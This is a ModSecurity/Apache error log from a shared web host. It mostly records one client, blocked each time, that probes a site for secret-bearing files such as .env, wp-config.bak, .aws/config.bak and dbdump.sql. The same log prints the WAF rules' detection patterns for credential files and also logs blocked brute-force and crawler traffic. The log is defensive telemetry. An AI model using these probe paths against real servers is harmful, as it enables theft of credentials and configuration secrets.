[Tue May 26 19:51:42.426943 2026] [security2:error] [pid 86490:tid 86641] [client 185.177.72.53:40844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/backup/users.bak"] [unique_id "ahWsdlZMwN0DpLVWo6KY-wAAAJo"]
[Tue May 26 19:51:42.428031 2026] [security2:error] [pid 86490:tid 86734] [client 185.170.104.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWsdlZMwN0DpLVWo6KY9gAAAPc"], referer: http://www.anujtradingco.com/pages/services-modern/
[Tue May 26 19:51:42.688482 2026] [security2:error] [pid 86490:tid 86572] [remote 78.142.18.172:52390] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWsdlZMwN0DpLVWo6KY_AAAsVE"]
[Tue May 26 19:51:42.910869 2026] [security2:error] [pid 86490:tid 86686] [client 185.177.72.53:40844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/docker-elk/.env"] [unique_id "ahWsdlZMwN0DpLVWo6KZCQAAAMc"]
[Tue May 26 19:51:42.913271 2026] [security2:error] [pid 86490:tid 86581] [remote 78.142.18.172:52390] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWsdlZMwN0DpLVWo6KZCAAAr1o"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:51:43.072334 2026] [security2:error] [pid 86490:tid 86742] [client 185.177.72.53:40844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/API/.env.bak"] [unique_id "ahWsd1ZMwN0DpLVWo6KZDQAAAP8"]
[Tue May 26 19:51:43.159344 2026] [security2:error] [pid 86490:tid 86637] [client 114.119.146.114:26717] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "koneksi.com.co"] [uri "/escucha-musica-en-telegram/"] [unique_id "ahWsd1ZMwN0DpLVWo6KZEQAAAJY"], referer: https://koneksi.com.co/escucha-musica-en-telegram/
[Tue May 26 19:51:43.724419 2026] [security2:error] [pid 86490:tid 86628] [client 185.177.72.53:10320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/reddit-bot/src/.env"] [unique_id "ahWsd1ZMwN0DpLVWo6KZKQAAAI0"]
[Tue May 26 19:51:43.880417 2026] [security2:error] [pid 86490:tid 86725] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsd1ZMwN0DpLVWo6KZIQAAAO4"]
[Tue May 26 19:51:45.026957 2026] [security2:error] [pid 86490:tid 86563] [remote 42.116.123.127:4667] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.123.116.42.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahWseFZMwN0DpLVWo6KZTQAAqkg"]
[Tue May 26 19:51:45.075446 2026] [security2:error] [pid 86490:tid 86620] [client 185.177.72.53:10320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/site/web.config"] [unique_id "ahWseVZMwN0DpLVWo6KZVgAAAIU"]
[Tue May 26 19:51:45.412244 2026] [security2:error] [pid 86490:tid 86630] [client 185.177.72.53:10320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/.env.bak"] [unique_id "ahWseVZMwN0DpLVWo6KZZgAAAI8"]
[Tue May 26 19:51:46.003409 2026] [security2:error] [pid 86490:tid 86682] [client 114.119.134.48:32801] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "shirdisaibabatemple.org"] [uri "/saibaba-books-saisatcharitra.php"] [unique_id "ahWselZMwN0DpLVWo6KZegAAAMM"], referer: https://shirdisaibabatemple.org/
[Tue May 26 19:51:46.258009 2026] [security2:error] [pid 86490:tid 86744] [client 185.177.72.53:10320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/dbdump.sql"] [unique_id "ahWselZMwN0DpLVWo6KZgwAAAQE"]
[Tue May 26 19:51:46.639472 2026] [security2:error] [pid 86490:tid 86705] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWselZMwN0DpLVWo6KZggAAANo"]
[Tue May 26 19:51:47.610135 2026] [security2:error] [pid 86490:tid 86677] [client 185.177.72.53:10320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/myserver/.env"] [unique_id "ahWse1ZMwN0DpLVWo6KZrgAAAL4"]
[Tue May 26 19:51:48.285215 2026] [security2:error] [pid 86490:tid 86689] [client 185.177.72.53:10320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/web-app/api/.env"] [unique_id "ahWsfFZMwN0DpLVWo6KZxAAAAMo"]
[Tue May 26 19:51:49.091909 2026] [security2:error] [pid 86490:tid 86647] [client 49.13.130.29:49122] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWsfVZMwN0DpLVWo6KZ3wAAAKA"], referer: http://ucdc.co.in/
[Tue May 26 19:51:49.111726 2026] [security2:error] [pid 86490:tid 86537] [remote 222.165.190.235:42660] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWsfFZMwN0DpLVWo6KZ2gAAli4"]
[Tue May 26 19:51:49.128264 2026] [security2:error] [pid 86490:tid 86681] [client 185.177.72.53:10320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/backend/src/.env"] [unique_id "ahWsfVZMwN0DpLVWo6KZ5gAAAMI"]
[Tue May 26 19:51:49.295875 2026] [security2:error] [pid 86490:tid 86737] [client 185.177.72.53:10320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.aws/config.bak"] [unique_id "ahWsfVZMwN0DpLVWo6KZ6gAAAPo"]
[Tue May 26 19:51:49.464287 2026] [security2:error] [pid 86490:tid 86650] [client 185.177.72.53:10320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/services/registry/.env"] [unique_id "ahWsfVZMwN0DpLVWo6KZ9AAAAKM"]
[Tue May 26 19:51:49.512319 2026] [security2:error] [pid 86490:tid 86722] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsfVZMwN0DpLVWo6KZ4gAAAOs"]
[Tue May 26 19:51:49.574346 2026] [security2:error] [pid 86490:tid 86545] [remote 222.165.190.235:42660] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWsfVZMwN0DpLVWo6KZ9QAA3DY"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:51:50.646191 2026] [security2:error] [pid 86490:tid 86621] [client 185.177.72.53:10320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/upload.php~"] [unique_id "ahWsflZMwN0DpLVWo6KaFQAAAIY"]
[Tue May 26 19:51:51.153503 2026] [security2:error] [pid 86490:tid 86675] [client 185.177.72.53:10320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/metrics/.env"] [unique_id "ahWsf1ZMwN0DpLVWo6KaJwAAALw"]
[Tue May 26 19:51:51.738932 2026] [security2:error] [pid 86490:tid 86715] [client 85.208.96.212:11156] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.yourstorybag.com"] [uri "/story-thinking-foreground-and-the-background/"] [unique_id "ahWsf1ZMwN0DpLVWo6KaPgAAAOQ"]
[Tue May 26 19:51:51.739068 2026] [security2:error] [pid 86490:tid 86715] [client 85.208.96.212:11156] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.yourstorybag.com"] [uri "/story-thinking-foreground-and-the-background/"] [unique_id "ahWsf1ZMwN0DpLVWo6KaPgAAAOQ"]
[Tue May 26 19:51:51.827505 2026] [security2:error] [pid 86490:tid 86704] [client 185.177.72.53:10320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/hrm-app/backend/.env"] [unique_id "ahWsf1ZMwN0DpLVWo6KaQgAAANk"]
[Tue May 26 19:51:52.074695 2026] [security2:error] [pid 86490:tid 86747] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsf1ZMwN0DpLVWo6KaOQAAAQQ"]
[Tue May 26 19:51:52.854063 2026] [autoindex:error] [pid 86490:tid 86644] [client 193.32.162.180:50104] AH01276: Cannot serve directory /home2/svijakqj/planooptics.co.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:51:54.202316 2026] [security2:error] [pid 86490:tid 86746] [client 185.177.72.53:10320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/fixtures/flight/.env"] [unique_id "ahWsglZMwN0DpLVWo6KakgAAAQM"]
[Tue May 26 19:51:54.340827 2026] [fcgid:warn] [pid 86490:tid 86725] (70014)End of file found: [client 199.45.155.68:60282] mod_fcgid: can't get data from http client
[Tue May 26 19:51:54.369826 2026] [security2:error] [pid 86490:tid 86629] [client 185.177.72.53:10320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/zipkin/.env"] [unique_id "ahWsglZMwN0DpLVWo6KalwAAAI4"]
[Tue May 26 19:51:54.521259 2026] [security2:error] [pid 86490:tid 86690] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsglZMwN0DpLVWo6KajQAAAMs"]
[Tue May 26 19:51:55.553343 2026] [security2:error] [pid 86490:tid 86666] [client 185.177.72.53:10320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/server/.env.bak"] [unique_id "ahWsg1ZMwN0DpLVWo6KauQAAALM"]
[Tue May 26 19:51:55.889236 2026] [security2:error] [pid 86490:tid 86625] [client 185.177.72.53:10320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/password/.env"] [unique_id "ahWsg1ZMwN0DpLVWo6KaxAAAAIo"]
[Tue May 26 19:51:56.056871 2026] [security2:error] [pid 86490:tid 86677] [client 185.177.72.53:10320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/application.properties.bak"] [unique_id "ahWshFZMwN0DpLVWo6KaywAAAL4"]
[Tue May 26 19:51:56.393931 2026] [security2:error] [pid 86490:tid 86735] [client 185.177.72.53:10320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/tests/default_settings/v7.0/.env"] [unique_id "ahWshFZMwN0DpLVWo6Ka1AAAAPg"]
[Tue May 26 19:51:56.464749 2026] [security2:error] [pid 86490:tid 86654] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWshFZMwN0DpLVWo6KaygAAAKc"]
[Tue May 26 19:51:56.716452 2026] [security2:error] [pid 86490:tid 86647] [client 185.177.72.53:29324] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/directory/.env"] [unique_id "ahWshFZMwN0DpLVWo6Ka4AAAAKA"]
[Tue May 26 19:51:57.192363 2026] [security2:error] [pid 86490:tid 86649] [client 185.177.72.53:29324] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/www/html/redis/.env"] [unique_id "ahWshVZMwN0DpLVWo6Ka8gAAAKI"]
[Tue May 26 19:51:57.348998 2026] [security2:error] [pid 86490:tid 86672] [client 185.177.72.53:29324] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/upload/config.bak"] [unique_id "ahWshVZMwN0DpLVWo6Ka8wAAALk"]
[Tue May 26 19:51:57.664097 2026] [security2:error] [pid 86490:tid 86685] [client 185.177.72.53:29324] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/static/default.bak"] [unique_id "ahWshVZMwN0DpLVWo6Ka-AAAAMY"]
[Tue May 26 19:51:57.819946 2026] [security2:error] [pid 86490:tid 86636] [client 185.177.72.53:29324] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api/keys/wp-config.bak"] [unique_id "ahWshVZMwN0DpLVWo6Ka_AAAAJU"]
[Tue May 26 19:51:58.290423 2026] [security2:error] [pid 86490:tid 86719] [client 185.177.72.53:29324] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/data/sample.bak"] [unique_id "ahWshlZMwN0DpLVWo6KbEAAAAOg"]
